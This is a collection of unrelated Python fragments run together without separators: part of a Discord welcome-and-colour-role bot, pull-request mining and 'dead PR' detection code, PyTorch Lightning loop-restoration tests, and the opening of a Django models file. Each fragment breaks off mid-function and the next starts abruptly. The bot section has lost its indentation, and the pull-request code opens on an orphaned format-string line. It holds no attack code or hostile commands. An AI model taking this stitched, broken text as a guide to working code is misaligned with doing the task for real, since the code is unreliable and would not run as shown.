def UserErr(skk): print("\033[93m {}\033[00m" .format(skk)) # Yellow
def SysErr(skk): print("\033[91m {}\033[00m" .format(skk)) # Red
def Permission(skk): print("\033[95m {}\033[00m" .format(skk)) # Purple
def Intent(skk): print("\033[34m {}\033[00m" .format(skk)) # Blue
def Conversion(skk): print("\033[96m {}\033[00m" .format(skk)) # Cyan
# I'll define some constant variables here, as well as a couple more subroutines.
firstConnect = True
overwrite = discord.PermissionOverwrite()
overwrite.send_messages=True
overwrite.read_messages=True
if useColour:
clr = 'colour'
else:
clr = 'color'
# Here's how I set my status!~
async def setStatus(type=''):
if type == "busy":
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name='with variables'), status=discord.Status.do_not_disturb)
elif type == "color":
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name='with colors'), status=discord.Status.idle)
else:
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name='for "tnm!list"'), status=discord.Status.online)
async def sendDebug(contents):
if useDebug:
if firstConnect: # Only here so Rare doesn't have a panic attack. And also to shrink the on_ready function.
de = [a for a in bot.get_all_channels() if a.name == debugSet]
debug = de[0]
try:
await debug.send(contents)
except (UnboundLocalError, AttributeError): # If my debug channel variable ever breaks, this will help me reassign it!
de = [a for a in bot.get_all_channels() if a.name == debugSet]
debug = de[0]
await debug.send(contents)
else:
pass
# Fancy embed generator time!~
def generateEmbed(clr=0x03FFED,title='[title]',desc='',f1e=0,f1t='[f1t]',f1c='[f1c]',f2e=0,f2t='[f2t]',f2c='[f2c]',f3e=0,f3t='[f3t]',f3c='[f3c]'):
global embedVal
embedVal = discord.Embed(
title=title, description=desc, color=clr
)
if f1e:
embedVal.add_field(name=f1t, value=f1c, inline=False)
if f2e:
embedVal.add_field(name=f2t, value=f2c, inline=False)
if f3e:
embedVal.add_field(name=f3t, value=f3c, inline=False)
return embedVal
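# Usage sketch (illustrative only): the f*e flags toggle each optional field, e.g.
#   embed = generateEmbed(title='Hello!', desc='A demo embed.',
#                         f1e=1, f1t='Field one', f1c='Field one contents')
#   await someChannel.send(embed=embed)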
# Setting the standard DM messages now, since we couldn't before.
def defaultEmbeds(type, user):
if type == 'welcome':
embedVal = generateEmbed(
title=":tada: **Hi, " + str(user) + "! Welcome to " + str(serverName) + "!**",
desc="I'm TNM-chan, your android assistant.\n",
f1e=1,
f1t=" You might not know what to do at first, but don't panic!",
f1c="DM me with `tnm!list`, and I'll send a list of commands your way!")
elif type == 'welcome_dm':
embedVal = generateEmbed(
title=":tada::grey_exclamation: **Hi, " + str(user) + "! Welcome to " + str(serverName) + "!**",
desc="You're seeing this message because you've disabled direct messages from other server members.\n",
f1e=1,
f1t="I send important messages through DMs, specifically if something goes wrong when you use a command.",
f1c="With that being said, it'd be nice if you could enable DMs from server members, that way I can DM you if something happens. (Don't worry, we won't let anyone spam you!)")
elif type == 'dmerror':
embedVal = generateEmbed(
title=":grey_exclamation: **Hey, " + str(user) + "!**",
desc="I'm sure you know this already, but you've disabled direct messages from other server members.\n",
f1e=1,
f1t="I send important messages through DMs, specifically if something goes wrong with your command.",
f1c="With that being said, it'd be nice if you could enable DMs from server members, that way I can DM you if something happens. (Don't worry, we won't let anyone spam you!)")
else:
return
return embedVal
# Now I'm ready, so I'll let you know!
Success('I\'m ready to go!')
# If all went well, I'll send a message to the terminal!
@bot.event
async def on_ready():
DiscordComponents(bot)
global firstConnect
global opMention
global debug
if firstConnect:
# Setting up sysop mentions.
opMention = await bot.fetch_user(int(soID))
await sendDebug(':green_circle: Connected.')
Conversion('I\'ve connected to the server!\n')
firstConnect = False
else:
await sendDebug(':blue_circle: Reconnected.')
Conversion('I got disconnected, but I\'m back online!\n')
await setStatus()
# Here's how I welcome new users, and get them into #lobby-f1!
@bot.event
async def on_member_join(ctx):
Intent('Hey! ' + str(ctx) + ' just joined the server.')
await sendDebug(':new: ' + str(ctx) + ' just joined the server!')
await setStatus("busy")
room = [a for a in bot.get_all_channels() if a.name == 'lobby-f1']
await room[0].set_permissions(ctx, overwrite=overwrite)
Information('They now have access to #lobby-f1...')
await sendDebug('Access to #lobby-f1 has been provided...')
try:
embedVal = defaultEmbeds('welcome', ctx.mention)
await ctx.send(embed=embedVal)
Information('...and the welcome DM\'s been sent.')
await sendDebug('...and the welcome DM has just been sent.')
except discord.Forbidden:
embedVal = defaultEmbeds('welcome_dm', ctx.mention)
await room[0].send(embed=embedVal)
UserErr('and I\'ve asked them to enable DMs from server members. Try to make sure they actually do this... ')
await sendDebug('...and I couldn\'t send the welcome DM, so I just sent a message in lobby-f1.')
Success('All set!\n')
await setStatus()
await sendDebug('All set!\n--')
### Okay, here's my commands!
### CORE COMMANDS
## This command allows a user to select a color; after which, I'll assign a role based on said color. Thanks, Color-senpai!~
@bot.command(name='color',aliases=['colour'])
async def color(ctx, hx = '[none]'):
Information(str(ctx.message.author) + ' wants to change their color to ' + str(hx) + '.\n')
await sendDebug(':art: ' + str(ctx.message.author) + ' wants to change their color to ' + str(hx) + '.')
# I need to make sure this was sent in the server.
if not ctx.guild:
# If not, I won't have any idea what to do, so I'll stop the command here and let them know.
UserErr('The command was sent in DMs, so context can\'t be found.')
await sendDebug(':grey_exclamation: The command was sent in DMs, so context can\'t be found. Command halted.\n--')
try:
UserErr(str(ctx.message.author) + ' tried to change their color, but sent the command in DMs and not in the server.\n')
embedVal = generateEmbed(clr=0xffcc00,title=":warning: **That didn't work...**",desc="An error occurred while processing your command.\n",f1e=1,f1t="**Problem:** You tried to set or change your " + str(clr) + ", but sent the command in DMs and not the server.",f1c="As much as I want to, I can't do much if you're not in the server...\n",f2e=1,f2t="**Solution:** Try running the command again, but in the server.",f2c="(Maybe one day, I can do all this cool stuff from in here. One day...)")
await ctx.send(embed=embedVal)
return
except discord.Forbidden:
return
# Otherwise, I'll start the command!
else:
await setStatus("color")
await ctx.message.delete()
name = ctx.message.author
sv = ctx.guild
dmerror = defaultEmbeds('dmerror', name)
# If hx isn't found, I'll assume the user needs help.
if hx == '[none]':
            await sendDebug(':grey_exclamation: No color was given, so I\'ll assume they need some help.')
% len(merged_unreleased_indexes))
return dfs, facts, unreleased_prs_event
@classmethod
@sentry_span
async def mine(cls,
date_from: date,
date_to: date,
time_from: datetime,
time_to: datetime,
repositories: Set[str],
participants: PRParticipants,
labels: LabelFilter,
jira: JIRAFilter,
with_jira_map: bool,
branches: pd.DataFrame,
default_branches: Dict[str, str],
exclude_inactive: bool,
release_settings: ReleaseSettings,
logical_settings: LogicalRepositorySettings,
prefixer: Prefixer,
account: int,
meta_ids: Tuple[int, ...],
mdb: Database,
pdb: Database,
rdb: Database,
cache: Optional[aiomcache.Client],
updated_min: Optional[datetime] = None,
updated_max: Optional[datetime] = None,
pr_blacklist: Optional[Tuple[Collection[int], Dict[str, List[int]]]] = None,
truncate: bool = True,
) -> Tuple["PullRequestMiner",
PullRequestFactsMap,
Dict[str, ReleaseMatch],
asyncio.Event]:
"""
Mine metadata about pull requests according to the numerous filters.
:param account: State DB account ID.
:param meta_ids: Metadata (GitHub) account IDs.
:param date_from: Fetch PRs created starting from this date, inclusive.
:param date_to: Fetch PRs created ending with this date, inclusive.
:param time_from: Precise timestamp of since when PR events are allowed to happen.
:param time_to: Precise timestamp of until when PR events are allowed to happen.
:param repositories: PRs must belong to these repositories (prefix excluded).
:param participants: PRs must have these user IDs in the specified participation roles \
(OR aggregation). An empty dict means everybody.
:param labels: PRs must be labeled according to this filter's include & exclude sets.
:param jira: JIRA filters for those PRs that are matched with JIRA issues.
:param with_jira_map: Value indicating whether we must load JIRA issues mapped to PRs. \
This is independent from filtering PRs by `jira`.
:param branches: Preloaded DataFrame with branches in the specified repositories.
:param default_branches: Mapping from repository names to their default branch names.
        :param exclude_inactive: PRs must have at least one event in the given time frame.
:param release_settings: Release match settings of the account.
:param logical_settings: Logical repository settings of the account.
:param updated_min: PRs must have the last update timestamp not older than it.
        :param updated_max: PRs must have the last update timestamp strictly older than it.
:param mdb: Metadata db instance.
:param pdb: Precomputed db instance.
        :param rdb: Persistentdata DB instance.
:param cache: memcached client to cache the collected data.
:param pr_blacklist: completely ignore the existence of these PR node IDs. \
The second tuple element is the ambiguous PRs: released by branch \
while there were no tag releases and the strategy is `tag_or_branch`.
:param truncate: activate the "time machine" and erase everything after `time_to`.
        :return: 1. New `PullRequestMiner` with the PRs satisfying the specified filters. \
2. Precomputed facts about unreleased pull requests. \
This is an optimization which breaks the abstraction a bit. \
3. `matched_bys` - release matches for each repository. \
4. Synchronization for updating the pdb table with merged unreleased PRs. \
Another abstraction leakage that we have to deal with.
"""
date_from_with_time = datetime.combine(date_from, datetime.min.time(), tzinfo=timezone.utc)
date_to_with_time = datetime.combine(date_to, datetime.min.time(), tzinfo=timezone.utc)
assert time_from >= date_from_with_time
assert time_to <= date_to_with_time
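        # For example, date_from=date(2021, 1, 1) yields
        # date_from_with_time=datetime(2021, 1, 1, 0, 0, tzinfo=utc), so
        # time_from may not precede midnight UTC of date_from, and time_to
        # may not exceed midnight UTC of date_to (both bounds are built
        # with datetime.min.time()).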
dfs, facts, _, _, _, _, _, matched_bys, event = await cls._mine(
date_from, date_to, repositories, participants, labels, jira, with_jira_map, branches,
default_branches, exclude_inactive, release_settings, logical_settings,
updated_min, updated_max, pr_blacklist, truncate, prefixer, account, meta_ids,
mdb, pdb, rdb, cache)
cls._truncate_prs(dfs, time_from, time_to)
return cls(dfs), facts, matched_bys, event
@classmethod
@sentry_span
async def fetch_prs(cls,
time_from: Optional[datetime],
time_to: datetime,
repositories: Union[Set[str], KeysView[str]],
participants: PRParticipants,
labels: LabelFilter,
jira: JIRAFilter,
exclude_inactive: bool,
pr_blacklist: Optional[BinaryExpression],
pr_whitelist: Optional[BinaryExpression],
branches: pd.DataFrame,
dags: Optional[Dict[str, DAG]],
account: int,
meta_ids: Tuple[int, ...],
mdb: Database,
pdb: Database,
cache: Optional[aiomcache.Client],
columns=PullRequest,
updated_min: Optional[datetime] = None,
updated_max: Optional[datetime] = None,
fetch_branch_dags_task: Optional[asyncio.Task] = None,
with_labels: bool = False,
) -> Tuple[pd.DataFrame, Dict[str, DAG], Optional[pd.DataFrame]]:
"""
Query pull requests from mdb that satisfy the given filters.
Note: we cannot filter by regular PR labels here due to the DB schema limitations,
so the caller is responsible for fetching PR labels and filtering by them afterward.
Besides, we cannot filter by participation roles different from AUTHOR and MERGER.
Note: we cannot load PRs that closed before time_from but released between
`time_from` and `time_to`. Hence the caller should map_releases_to_prs separately.
There can be duplicates: PR closed between `time_from` and `time_to` and released
between `time_from` and `time_to`.
Note: we cannot load PRs that closed before time_from but deployed between
`time_from` and `time_to`. Hence the caller should map_deployments_to_prs separately.
There can be duplicates: PR closed between `time_from` and `time_to` and deployed
between `time_from` and `time_to`.
We have to resolve the merge commits of rebased PRs so that they do not appear
force-push-dropped.
:return: pandas DataFrame with the PRs indexed by node_id; \
commit DAGs that contain the branch heads; \
(if was required) DataFrame with PR labels.
"""
assert isinstance(mdb, Database)
assert isinstance(pdb, Database)
pr_list_coro = cls._fetch_prs_by_filters(
time_from, time_to, repositories, participants, labels, jira, exclude_inactive,
pr_blacklist, pr_whitelist, meta_ids, mdb, cache, columns=columns,
updated_min=updated_min, updated_max=updated_max,
)
if columns is not PullRequest and PullRequest.merge_commit_id not in columns and \
PullRequest.merge_commit_sha not in columns:
prs, labels = await pr_list_coro
return prs, dags, labels if with_labels else None
if fetch_branch_dags_task is None:
fetch_branch_dags_task = cls._fetch_branch_dags(
repositories, dags, branches, account, meta_ids, mdb, pdb, cache)
dags, (prs, labels) = await gather(fetch_branch_dags_task, pr_list_coro)
async def load_labels():
if not with_labels:
return None
if labels is not None:
return labels
return await fetch_labels_to_filter(prs.index.values, meta_ids, mdb)
prs, labels = await gather(
cls.mark_dead_prs(prs, branches, dags, meta_ids, mdb, columns),
load_labels(),
)
return prs, dags, labels
@classmethod
async def mark_dead_prs(cls,
prs: pd.DataFrame,
branches: pd.DataFrame,
dags: Dict[str, DAG],
meta_ids: Tuple[int, ...],
mdb: Database,
columns=PullRequest,
) -> pd.DataFrame:
"""
Add and fill "dead" column in the `prs` DataFrame.
        A PR is considered dead (force-push-dropped) if it does not exist in the commit DAG and \
we cannot detect its rebased clone.
"""
prs["dead"] = False
if branches.empty:
return prs
merged_prs = prs.take(np.nonzero((
prs[PullRequest.merged_at.name] <= datetime.now(timezone.utc) - timedelta(hours=1)
).values)[0])
# timedelta(hours=1) must match the `exptime` of `fetch_repository_commits()`
# commits DAGs are cached and may be not fully up to date, so otherwise some PRs may
# appear as wrongly force push dropped; see also: DEV-554
if merged_prs.empty:
return prs
pr_numbers = merged_prs[PullRequest.number.name].values
assert merged_prs.index.nlevels == 1
pr_node_ids = merged_prs.index.values
pr_repos = merged_prs[PullRequest.repository_full_name.name].values
repo_order = np.argsort(pr_repos)
unique_pr_repos, pr_repo_counts = np.unique(pr_repos, return_counts=True)
pr_merge_hashes = \
merged_prs[PullRequest.merge_commit_sha.name].values.astype("S40")[repo_order]
pos = 0
queries = []
dead = []
acc_id_cond = PushCommit.acc_id.in_(meta_ids)
min_commit_date = merged_prs[PullRequest.merged_at.name].min()
committed_date_cond = PushCommit.committed_date >= min_commit_date
substr = sql.func.substr(PushCommit.message, 1, 32)
sqlite = mdb.url.dialect == "sqlite"
for repo, n_prs in zip(unique_pr_repos, pr_repo_counts):
begin_pos = pos
end_pos = pos + n_prs
pos += n_prs
repo_pr_merge_hashes = pr_merge_hashes[begin_pos:end_pos]
dag_hashes = dags[repo][0]
if len(dag_hashes) == 0:
# no branches found in `fetch_repository_commits()`
continue
not_found = dag_hashes[
searchsorted_inrange(dag_hashes, repo_pr_merge_hashes)
] != repo_pr_merge_hashes
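            # Membership test against a sorted hash array: for each PR merge
            # hash, searchsorted_inrange returns the position of the nearest
            # DAG hash; if the hash found there differs, the merge commit is
            # not in the DAG. E.g. with dag_hashes = [b"aa", b"cc"], a PR
            # hash of b"bb" lands on b"cc", which != b"bb", so that PR is
            # flagged as not found.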
indexes = repo_order[begin_pos:end_pos][not_found]
dead.extend(dead_node_ids := pr_node_ids[indexes])
repo_cond = PushCommit.repository_full_name == repo
for pr_node_id, n in zip(dead_node_ids, pr_numbers[indexes]):
if sqlite:
# SQLite does not support parameter recycling
acc_id_cond = PushCommit.acc_id.in_(meta_ids)
committed_date_cond = PushCommit.committed_date >= min_commit_date
substr = sql.func.substr(PushCommit.message, 1, 32)
repo_cond = PushCommit.repository_full_name == repo
queries.append(
sql.select([PushCommit.node_id.label("commit_node_id"),
PushCommit.sha.label("sha"),
sql.literal_column("'" + repo + "'").label("repo"),
sql.literal_column(str(pr_node_id)).label("pr_node_id"),
PushCommit.committed_date,
PushCommit.pushed_date])
.where(sql.and_(acc_id_cond,
repo_cond,
committed_date_cond,
substr.like("Merge pull request #%d from %%" % n))))
if not queries:
return prs
prs.loc[dead, "dead"] = True
# we may have MANY queries here and Postgres responds with StatementTooComplexError
# split them by 100-sized batches to stay below the resource limits
batch_size = 100
tasks = []
for batch_index in range(0, len(queries), batch_size):
batch = queries[batch_index:batch_index + batch_size]
if len(batch) == 1:
query = batch[0]
else:
query = sql.union_all(*batch)
tasks.append(read_sql_query(query, mdb, [
"commit_node_id", "sha", "repo", "pr_node_id",
PushCommit.committed_date, PushCommit.pushed_date,
]))
resolveds = await gather(*tasks, op="mark_dead_prs commit SQL UNION ALL-s")
resolved = pd.concat(resolveds)
# look up the candidates in the DAGs
pr_repos = resolved["repo"].values
repo_order = np.argsort(pr_repos)
unique_pr_repos, pr_repo_counts = np.unique(pr_repos, return_counts=True)
pr_merge_hashes = resolved["sha"].values.astype("S")[repo_order]
pos = 0
alive_indexes = []
for repo, n_prs in zip(unique_pr_repos, pr_repo_counts):
begin_pos = pos
end_pos = pos + n_prs
pos += n_prs
repo_pr_merge_hashes = pr_merge_hashes[begin_pos:end_pos]
dag_hashes = dags[repo][0]
found = dag_hashes[
searchsorted_inrange(dag_hashes, repo_pr_merge_hashes)
] == repo_pr_merge_hashes
alive_indexes.extend(repo_order[begin_pos:end_pos][found])
if (resolved := resolved.take(alive_indexes)).empty:
return prs
        # take the commit that was committed the latest
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from copy import deepcopy
from dataclasses import dataclass
from typing import Any, Dict, Iterator
from unittest import mock
from unittest.mock import ANY
import pytest
import torch
from torch.utils.data import DataLoader
from pl_examples.bug_report_model import RandomDataset
from pytorch_lightning import LightningModule, Trainer
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loops import Loop, TrainingBatchLoop
from pytorch_lightning.trainer.progress import BaseProgress
from tests.helpers import BoringModel
from tests.helpers.runif import RunIf
class NestedLoop(Loop):
def __init__(self):
super().__init__()
self.child_loop0 = None
self.child_loop1 = None
@property
def done(self) -> bool:
return False
def connect(self, child0, child1):
self.child_loop0 = child0
self.child_loop1 = child1
def reset(self) -> None:
pass
def advance(self, *args, **kwargs):
pass
@pytest.mark.parametrize("loop_name", ["fit_loop", "validate_loop", "test_loop", "predict_loop"])
def test_connect_loops_direct(loop_name):
"""Test Trainer referenes in loops on assignment."""
loop = NestedLoop()
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = loop.trainer
trainer = Trainer()
# trainer.loop = loop
setattr(trainer, loop_name, loop)
assert loop.trainer is trainer
def test_connect_loops_recursive():
"""Test Trainer references in a nested loop assigned to a Trainer."""
main_loop = NestedLoop()
child0 = NestedLoop()
child1 = NestedLoop()
main_loop.connect(child0, child1)
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = main_loop.trainer
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = main_loop.child_loop0.trainer
trainer = Trainer()
trainer.fit_loop = main_loop
assert child0.trainer is trainer
assert child1.trainer is trainer
def test_connect_subloops(tmpdir):
"""Test connecting individual subloops by calling `trainer.x.y.connect()`"""
model = BoringModel()
trainer = Trainer(default_root_dir=tmpdir, fast_dev_run=True)
epoch_loop = trainer.fit_loop.epoch_loop
new_batch_loop = TrainingBatchLoop()
epoch_loop.connect(batch_loop=new_batch_loop)
assert epoch_loop.batch_loop is new_batch_loop
with pytest.raises(RuntimeError, match="The loop is not attached to a Trainer"):
_ = new_batch_loop.trainer
trainer.fit(model)
assert new_batch_loop.trainer is trainer
class CustomException(Exception):
pass
def test_loop_restore():
class Simple(Loop):
def __init__(self, dataset: Iterator):
super().__init__()
self.iteration_count = 0
self.dataset = dataset
@property
def skip(self) -> bool:
return False
@property
def done(self) -> bool:
return self.iteration_count > len(self.dataset)
def reset(self) -> None:
self.iter_dataset = iter(self.dataset)
if self.restarting:
for _ in range(self.iteration_count):
next(self.iter_dataset)
self.iteration_count += 1
else:
self.outputs = []
def advance(self) -> None:
value = next(self.iter_dataset)
if self.iteration_count == 5:
raise CustomException
self.outputs.append(value)
def on_advance_end(self) -> None:
self.iteration_count += 1
def state_dict(self) -> Dict:
return {"iteration_count": self.iteration_count, "outputs": self.outputs}
def load_state_dict(self, state_dict: Dict) -> None:
self.iteration_count = state_dict["iteration_count"]
self.outputs = state_dict["outputs"]
trainer = Trainer()
data = range(10)
loop = Simple(data)
loop.trainer = trainer
try:
loop.run()
state_dict = {}
except CustomException:
state_dict = loop.state_dict()
loop = Simple(data)
loop.trainer = trainer
loop.load_state_dict(state_dict)
loop.restarting = True
loop.run()
assert not loop.restarting
assert loop.outputs == list(range(10))
def test_loop_hierarchy():
@dataclass
class SimpleProgress(BaseProgress):
increment: int = 0
class Simple(Loop):
def __init__(self, a):
super().__init__()
self.a = a
self.progress = SimpleProgress()
def advance(self, *args: Any, **kwargs: Any) -> None:
loop = getattr(self, "loop_child", None)
if not loop:
return
loop.run()
def on_advance_end(self):
self.progress.increment += 1
@property
def done(self) -> bool:
return self.progress.increment > 0
def reset(self) -> None:
...
def on_save_checkpoint(self) -> Dict:
return {"a": self.a}
def on_load_checkpoint(self, state_dict: Dict) -> None:
self.a = state_dict["a"]
loop_parent = Simple(1)
loop_child = Simple(2)
loop_parent.loop_child = loop_child
# check the trainer reference is propagated
loop_parent.trainer = Trainer()
assert loop_child.trainer is loop_parent.trainer
state_dict = loop_parent.state_dict()
assert state_dict == {
"state_dict": {"a": 1},
"progress": {"increment": 0},
"loop_child.state_dict": {"a": 2},
"loop_child.progress": {"increment": 0},
}
state_dict["loop_child.state_dict"]["a"] = 3
# check restarting after `load_state_dict`
loop_parent.load_state_dict(state_dict)
assert loop_parent.restarting
loop_parent.run()
# check the new state after `run`
state_dict = loop_parent.state_dict()
assert state_dict == {
"state_dict": {"a": 1},
"progress": {"increment": 1},
"loop_child.state_dict": {"a": 3},
"loop_child.progress": {"increment": 1},
}
loop_parent_copy = deepcopy(loop_parent)
assert loop_parent_copy.state_dict() == loop_parent.state_dict()
assert loop_parent_copy.on_save_checkpoint() == state_dict["state_dict"]
assert loop_parent_copy.loop_child.on_save_checkpoint() == state_dict["loop_child.state_dict"]
loop_parent = Simple(1)
loop_child = Simple(2)
loop_parent.loop_child = loop_child
loop_parent.load_state_dict(state_dict)
assert loop_parent.progress.increment == 1
assert loop_parent.loop_child.progress.increment == 1
del loop_parent.loop_child
state_dict = loop_parent.state_dict()
assert state_dict == {"state_dict": {"a": 1}, "progress": {"increment": 1}}
@RunIf(min_torch="1.7.0")
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.parametrize("stop_epoch", (1, 2))
@pytest.mark.parametrize("stop_batch", (1, 2))
@pytest.mark.parametrize("n_dataloaders,stop_dataloader", [(2, 0), (2, 1), (3, 2)])
def test_loop_restart_progress_multiple_dataloaders(tmpdir, n_dataloaders, stop_dataloader, stop_epoch, stop_batch):
n_batches = 5
n_epochs = 3
class ValidationModel(BoringModel):
def __init__(self):
super().__init__()
def validation_step(self, batch, batch_idx, dataloader_idx):
if self.current_epoch == stop_epoch and batch_idx == stop_batch and dataloader_idx == stop_dataloader:
raise CustomException
return super().validation_step(batch, batch_idx)
def val_dataloader(self):
return [super(ValidationModel, self).val_dataloader() for _ in range(n_dataloaders)]
model = ValidationModel()
model.validation_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=n_epochs,
limit_train_batches=1,
limit_val_batches=n_batches,
num_sanity_val_steps=0,
)
# simulate a failure
with pytest.raises(CustomException):
trainer.fit(model)
ckpt_path = str(tmpdir / ".pl_auto_save.ckpt")
checkpoint = torch.load(ckpt_path)["loops"]["fit_loop"]
total_dataloader = stop_epoch * n_dataloaders + stop_dataloader
expected = {
"total": {"ready": total_dataloader + 1, "completed": total_dataloader},
"current": {"ready": stop_dataloader + 1, "completed": stop_dataloader},
}
assert checkpoint["epoch_loop.val_loop.dataloader_progress"] == expected
trainer.fit_loop.load_state_dict(checkpoint)
# `nbe_`: non-breaking epoch, as in, no exception will be raised. `be_`: breaking epoch
nbe_total_val_batch = stop_epoch * n_dataloaders * n_batches
be_total_val_batch = stop_dataloader * n_batches + stop_batch
total_val_batch = nbe_total_val_batch + be_total_val_batch
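    # Worked example (illustrative): with n_dataloaders=2, n_batches=5,
    # stop_epoch=1, stop_dataloader=0, stop_batch=1 we get
    # nbe_total_val_batch = 1*2*5 = 10 and be_total_val_batch = 0*5 + 1 = 1,
    # so total_val_batch = 11 (and the "ready"/"started" counters are 12).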
expected = {
"total": {
"ready": total_val_batch + 1,
"started": total_val_batch + 1,
"processed": total_val_batch,
"completed": total_val_batch,
},
"current": {
"ready": stop_batch + 1,
"started": stop_batch + 1,
"processed": stop_batch,
"completed": stop_batch,
},
"is_last_batch": False,
}
assert trainer.fit_loop.epoch_loop.val_loop.epoch_loop.batch_progress.state_dict() == expected
@RunIf(min_torch="1.7.0")
@mock.patch.dict(os.environ, {"PL_FAULT_TOLERANT_TRAINING": "1"})
@pytest.mark.parametrize("accumulate_grad_batches", (1, 2, 3))
@pytest.mark.parametrize("n_optimizers", (1, 3, 5))
@pytest.mark.parametrize("stop_epoch", (1, 2))
@pytest.mark.parametrize("stop_batch", (1, 2))
@pytest.mark.parametrize("stop_optimizer", (1, 2))
def test_loop_state_on_exception(accumulate_grad_batches, stop_epoch, stop_batch, stop_optimizer, n_optimizers, tmpdir):
stop_optimizer = stop_optimizer if stop_optimizer < n_optimizers else 0
n_epochs = 3
n_batches = 3
class TestModel(BoringModel):
def __init__(self):
super().__init__()
if n_optimizers > 1:
self.configure_optimizers = self.configure_optimizers_multiple
def training_step(self, batch, batch_idx, optimizer_idx=0):
if self.trainer.current_epoch == stop_epoch and batch_idx == stop_batch and optimizer_idx == stop_optimizer:
raise CustomException
return super().training_step(batch, batch_idx)
def configure_optimizers_multiple(self):
optimizers = [torch.optim.Adam(self.layer.parameters(), lr=0.1) for _ in range(n_optimizers)]
lr_scheduler_0 = torch.optim.lr_scheduler.StepLR(optimizers[0], step_size=1)
lr_scheduler_1 = torch.optim.lr_scheduler.StepLR(optimizers[1], step_size=1)
# no scheduler for optimizer_2
lr_schedulers = [lr_scheduler_0, {"scheduler": lr_scheduler_1, "interval": "step"}]
return optimizers, lr_schedulers
model = TestModel()
model.training_epoch_end = None
trainer = Trainer(
default_root_dir=tmpdir,
max_epochs=n_epochs,
limit_train_batches=n_batches,
limit_val_batches=0,
accumulate_grad_batches=accumulate_grad_batches,
enable_progress_bar=False,
logger=False,
enable_checkpointing=False,
)
# simulate a failure
with pytest.raises(CustomException):
trainer.fit(model)
ckpt_path = str(tmpdir / ".pl_auto_save.ckpt")
assert os.path.exists(ckpt_path)
checkpoint = torch.load(ckpt_path)
optim_progress = trainer.fit_loop.epoch_loop.batch_loop.optimizer_loop.optim_progress
sch_progress = trainer.fit_loop.epoch_loop.scheduler_progress
# `nbe_`: non-breaking epoch, as in, no exception will be raised. `be_`: breaking epoch
nbe_batches_completed = stop_epoch * n_batches
be_batches_completed = stop_batch
be_batches_ready = stop_batch + 1
# lightning applies leftover accumulated gradients when the epoch ends
has_leftover_accumulation_batches = n_batches % accumulate_grad_batches != 0
# number of batches that will call `optimizer.step()` during non-breaking and breaking epochs
nbe_stepping_batches = nbe_batches_completed // accumulate_grad_batches
be_stepping_batches = be_batches_completed // accumulate_grad_batches
nbe_total_opt_steps = (nbe_stepping_batches + has_leftover_accumulation_batches) * n_optimizers
does_last_be_batch_step = be_batches_ready % accumulate_grad_batches == 0 or has_leftover_accumulation_batches
be_total_opt_steps = be_stepping_batches * n_optimizers + does_last_be_batch_step * stop_optimizer
assert optim_progress.optimizer_steps == nbe_total_opt_steps + be_total_opt_steps
assert optim_progress.optimizer.step.current.completed == be_total_opt_steps
has_opt_stepped_in_be = stop_batch + 1 >= accumulate_grad_batches
nbe_total_zero_grad = (nbe_stepping_batches + has_leftover_accumulation_batches) * n_optimizers
does_last_be_batch_zero_grad = be_batches_completed % accumulate_grad_batches == 0
# `max` because the first batch always zero-grads
be_total_zero_grad = max(1, be_stepping_batches) * n_optimizers + stop_optimizer * does_last_be_batch_zero_grad
assert optim_progress.optimizer.zero_grad.total.completed == nbe_total_zero_grad + be_total_zero_grad
assert optim_progress.optimizer.zero_grad.current.completed == be_total_zero_grad
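    # Worked example (illustrative): with accumulate_grad_batches=2,
    # n_optimizers=3, n_batches=3, stop_epoch=1, stop_batch=1,
    # stop_optimizer=1: nbe_stepping_batches = 3//2 = 1 and a leftover
    # accumulation batch exists, so nbe_total_opt_steps = (1+1)*3 = 6;
    # be_stepping_batches = 1//2 = 0 and the breaking batch does step
    # (ready=2, 2 % 2 == 0), so be_total_opt_steps = 0*3 + 1*1 = 1,
    # i.e. 7 optimizer steps in total.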
nbe_sch_steps = stop_epoch
be_sch_steps = 0 # the current epoch did not complete
if n_optimizers > 1:
# assumes that the scheduler config is unchanged
# `* 1` because there is only one step-level scheduler
nbe_sch_steps = stop_epoch + nbe_stepping_batches + has_leftover_accumulation_batches * 1
# `0 +` for the epoch-level scheduler
be_sch_steps = 0 + be_stepping_batches
assert sch_progress.total.completed == nbe_sch_steps + be_sch_steps
assert sch_progress.current.completed == be_sch_steps
expected = {
"state_dict": ANY,
"epoch_progress": {
"total": {
"ready": stop_epoch + 1,
"started": stop_epoch + 1,
"processed": stop_epoch,
"completed": stop_epoch,
},
"current": {
"ready": stop_epoch + 1,
"started": stop_epoch + 1,
"processed": stop_epoch,
"completed": stop_epoch,
},
},
"epoch_loop.state_dict": ANY,
"epoch_loop.batch_progress": {
"total": {
"ready": nbe_batches_completed + be_batches_completed + 1,
"started": nbe_batches_completed + be_batches_completed + 1,
"processed": nbe_batches_completed + be_batches_completed,
"completed": nbe_batches_completed + be_batches_completed,
},
"current": {
"ready": stop_batch + 1,
"started": stop_batch + 1,
# Repository: mwschall/storkive
from io import BytesIO
from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.db import models, IntegrityError
from django.db.models import Min, Max, OuterRef, Subquery
from django.urls import reverse
from django.utils.functional import cached_property
from library.expressions import Concat, SQCount
from library.fields import CssField, ShortUUIDField
from library.managers import OrderedLowerManager
from library.mixins import AuthorsMixin, CodesMixin, DEFAULT_AUTHOR_SEP
from library.util import get_sort_name, get_author_slug, b64md5sum, inst_path, is_css_color
# TODO: Come up with a more specific name for this functionality. Or don't.
class List(models.Model):
slug = ShortUUIDField(
unique=True,
)
